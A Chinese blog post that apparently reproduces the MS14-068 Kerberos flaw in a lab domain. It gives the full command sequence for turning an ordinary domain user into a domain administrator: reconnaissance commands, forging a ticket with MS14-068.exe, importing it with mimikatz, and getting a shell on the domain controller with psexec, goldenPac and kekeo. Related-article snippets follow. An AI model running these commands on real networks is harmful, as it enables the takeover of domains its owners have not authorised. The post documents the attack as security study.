MS14-068漏洞复现

最新推荐文章于 2024-05-03 02:57:37 发布
最新推荐文章于 2024-05-03 02:57:37 发布
阅读量5.1k 收藏 17
点赞数 1
分类专栏: 内网渗透 文章标签: MS14-068 域控
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/104139081
版权

0x01 简介

MS14-068漏洞可将普通域用户权限提升为域管理员用户,这个漏洞实战是碰到的可能性非常小了,但是如此经典的漏洞,不去玩一下,真的很不爽,于是搭建环境,复现一波。

0x02 漏洞复现

方法1:MS14-068工具利用

(https://github.com/ianxtianxt/MS14-068)
最开始想用一台win 2003作为域内机器攻击域控,可工具在03上各种问题,于是换了一台08的机器。
1、假定现在已经获取了域内的一台机器。首先查看当前用户是否为域用户。
net user zhangsan /domain
在这里插入图片描述
获取域控信息
net group “domain controllers” /domain
在这里插入图片描述
在这里插入图片描述

2、通过dir访问域控的共享文件夹,显示拒绝访问。
在这里插入图片描述

3、这里我们要用到“MS14-068”工具复现此漏洞,我们需要获取当前域机器的域用户名、密码、用户sid等信息。
获取用户sid:whoami /user
在这里插入图片描述

4、执行下列命令,会在当前目录生成一个ccache文件。
MS14-068.exe -u zhangsan@ggyao.com -p Aatesttest -s S-1-5-21-1572179255-3807128208-2620765154-1116 -d WIN-2008-DC.ggyao.com
在这里插入图片描述

5、删除当前域机器的票证:klist purge。
在这里插入图片描述

6、使用mimikatz将ccache文件导入,提升为域控权限。
kerberos::ptc TGT_zhangsan@ggyao.com.ccache
在这里插入图片描述

7、成功dir域控服务器C盘。
在这里插入图片描述

8、使用psexec.exe获取一个交互式shell。
psexec.exe \WIN-2008-DC.ggyao.com cmd
在这里插入图片描述

psexec执行单条命令:
psexec.exe \WIN-2008-DC.ggyao.com cmd /c “ipconfig”
在这里插入图片描述

方法2:goldenPac.exe(推荐使用)

(https://github.com/maaaaz/impacket-examples-windows)
此工具是impacket工具包里的,它是MS14-068+psexec的组合,因此使用起来非常放方便快捷。
goldenPac.exe ggyao.com/zhangsan:Aatesttest@WIN-2008-DC.ggyao.com
在这里插入图片描述

方法3:kekeo.exe

(https://github.com/gentilkiwi/kekeo/releases)
通过kekeo.exe获取域控权限,此工具并非每次都能成功利用。
kekeo.exe “exploit::ms14068 /domain:ggyao.com /user:zhangsan /password:Aatesttest /ptt” “exit”
在这里插入图片描述

LQxdp
关注
  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
AD域渗透 | MS14068漏洞原理及复现
m0_57221101的博客
04-18 2565
漏洞编号MS14-068漏洞,将允许任意用户提升到域管理员的权限,补丁编号则是KB3011780 原理分析 ​ 在之前提到白银票据攻击的时候,我们仿佛默认了一个用户可以访问任何的服务。但事实上,往往我们需要控制一些账户使他们不能访问一些服务。这时微软引入了PAC的概念,PAC包含了用户的ID,组ID一类的认证信息。进一步的PAC的分析,请期待我之后会发布的Kerberos协议的抓包分析。如果现在就想要进一步了解请看文末的链接,将导向daiker大佬的文章 ​ 在这里PAC权限验证机制产生漏洞的原因是
ms14-068的深入分析
zz_strive_2012的专栏
06-17 5078
0×0 背景 初次认识该漏洞是在FreeBuf上对该漏洞的预警《漏洞预警:系统权限提升漏洞(CVE-2014-6324)影响全版本Windows服务器》: 微软今天(2014-11-18)发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。今天发布的MS14-068漏洞补丁用于解决Microsoft Windows Kerberos KDC漏洞(CVE-2014-
MS14-068漏洞复现
一纸荒芜的博客
08-26 3213
ms14-068漏洞复现
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1)
最新发布
2401_84297796的博客
05-03 755
1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
MS14-068 (CVE-2014-6324)域用户提权漏洞
做自己喜欢的事,并将其发挥到极致!
03-15 7272
文章目录声明一、漏洞简介二、漏洞原理三、实验环境四、漏洞利用利用思路前提条件方法一方法二方法三方法四五、参考文章 声明 本篇文章仅用于技术研究,切勿用于非法用途,仅供参考! 一、漏洞简介 远程权限提升漏洞存在于 Microsoft Windows 的 Kerberos KDC 实现中。存在该漏洞的情况为无法正确验证签名,这可能造成 Kerberos 服务票证的某些方面被人伪造。简单来说就是一个域内的普通账户可以利用此漏洞进行权限提升,升级为域管理员权限。 二、漏洞原理 Kerberos认证原理:http
第68天-内网安全-域横向 PTH&PTK&PTT 哈希票据传
MCTSOG的博客
05-18 879
思维导图 知识点 Kerberos 协议 具体工作方法,在域中,简要介绍一下: 客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用krbtgt 密码 hash 作为密钥),发送给 kdc(域控),kdc 对用户进行检测,成功之后创建 TGT(Ticket-Granting Ticket) 将 TGT 进行加密签名返回给客户机器,只有域用户 krbtgt 才能读 取 kerberos 中 TGT 数据 然后客户机将 TGT 发送给域控制器 KDC 请求 TGS(票证授权服务)票证,并且对
ms14-068利用工具包.zip
07-01
"minikataz"是一个提及的64位程序,很可能是一个轻量级的Kerberos模拟环境或测试工具,用于在安全环境中复现MS14-068漏洞。它可能帮助研究人员或安全专家在受控环境下理解漏洞的工作原理,测试修复措施,或者验证...
ms14-068漏洞复现
whojoe的博客
04-12 943
ms14-068漏洞复现 MS14-068域提权漏洞复现 一、漏洞说明 ​ 改漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。 ​ 微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068 二、漏洞原理 ​ Kerberos认...
(转)MS14-068域内提权漏洞总结
weixin_30849591的博客
05-07 923
0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票。银票是一张tgs,也就是一张服务票据。服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器。所以ms14-068的来源和银票是息息相关的。 在mimikatz作者的ppt里面是这样描述的: 所以说这真的是一个大漏洞,允许...
mimikatz的基本使用
a3320315的博客
05-25 9747
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
域内提权之MS14-068
good good study
03-17 4680
目标:普通域成员——>域管理员 漏洞利用前提 域控没有打MS14-068的补丁(KB3011780) 拿下一台加入域的计算机 有这台域内计算机的域用户密码和Sid 漏洞复现 环境: win2012(192.168.10.2) 域控,开启了防火墙 win7(192.168.10.5),域成员 1. win7获取域账户的密码及sid值 win7机器上查看域管理员,可发现,并没有自己 这里使用mimikatz去抓取域用户的明文密码 mimikatz.exe "privilege:....
MS14-068提权漏洞解析
weixin_43733912的博客
09-17 2716
@一、漏洞说明 欢迎使用Markdown编辑器 该漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。 微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markd
复现MS14-068
这里是Y.lin的博客,目前是一名网络安全专业的学生,希望和师傅们一起进步吧!
05-23 530
MS14-068
内网渗透---ms14068
yc的博客
05-24 2777
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、MS14-068的利用条件?二、利用步骤1.查看服务器是否打补丁2.获取用户的sid值3.删除系统票据4.生成票据5.导入票据6.提权利用总结 前言 ms14-068漏洞主要通过伪造域管的TGT,将普通用户权限提权为域管权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。 一、MS14-068的利用条件? 1、获取域普通用户的账号密码.
ms14-064漏洞复现停滞在Sending exploit
06-12
我理解你的问题是想要复现 MS14-064 漏洞,但是在发送 exploit 时遇到了问题,出现了停滞的情况。 首先,MS14-064 是一个由 Microsoft 发布的安全公告,涉及的漏洞编号为 CVE-2014-6324,它存在于 Windows Object Linking and Embedding (OLE) 中,攻击者可以利用该漏洞实现远程执行代码。 如果你想要复现漏洞,可以先找到一个受影响的 Windows 系统,并下载相应的漏洞利用工具。在发送 exploit 之前,你需要确保目标主机与攻击者主机之间能够正常通信,并且攻击者主机已经安装了相应的依赖库和工具。 如果出现了停滞的情况,可能是由于网络连接出现了问题,或是漏洞利用工具配置不正确等原因。你可以根据漏洞利用工具的日志信息来进行排查,或是参考相关的攻击教程进行调试。 需要注意的是,漏洞利用是一项高度危险的操作,建议在合法授权的情况下进行,并且不要在生产环境中进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值